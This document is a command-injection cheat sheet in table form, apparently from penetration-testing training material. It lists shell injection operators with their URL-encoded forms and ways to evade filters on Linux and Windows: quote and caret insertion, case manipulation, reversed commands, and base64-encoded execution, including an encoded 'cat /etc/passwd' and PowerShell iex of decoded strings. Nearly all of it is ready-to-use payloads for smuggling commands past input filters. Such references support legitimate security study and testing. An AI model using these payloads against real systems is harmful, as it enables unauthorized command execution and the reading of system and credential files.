| Injection Operator | Injection Character | URL-Encoded Character | Executed Command |
|---|---|---|---|
| Semicolon | ; |
%3b |
Both |
| New Line | \\n |
%0a |
Both |
| Background | & |
%26 |
Both (second output generally shown first) |
| Pipe | \| |
%7c |
Both (only second output is shown) |
| AND | && |
%26%26 |
Both (only if first succeeds) |
| OR | \|\| |
%7c%7c |
Second (only if first fails) |
| Sub-Shell | ```` | %60%60 |
Both (Linux-only) |
| Sub-Shell | $() |
%24%28%29 |
Both (Linux-only) |
| Code | Description |
|---|---|
| Character Insertion | |
' or " |
Total must be even |
$@ or \\ |
Linux only |
| Case Manipulation | |
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") |
Execute command regardless of cases |
$(a="WhOaMi";printf %s "${a,,}") |
Another variation of the technique |
| Reversed Commands | |
echo 'whoami' \| rev |
Reverse a string |
$(rev<<<'imaohw') |
Execute reversed command |
| Encoded Commands | |
echo -n 'cat /etc/passwd \| grep 33' \| base64 |
Encode a string with base64 |
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) |
Execute b64 encoded string |
| Code | Description |
|---|---|
| Character Insertion | |
' or " |
Total must be even |
^ |
Windows only (CMD) |
| Case Manipulation | |
WhoAmi |
Simply send the character with odd cases |
| Reversed Commands | |
"whoami"[-1..-20] -join '' |
Reverse a string |
iex "$('imaohw'[-1..-20] -join '')" |
Execute reversed command |
| Encoded Commands | |
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) |
Encode a string with base64 |
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))" |
Execute b64 encoded string |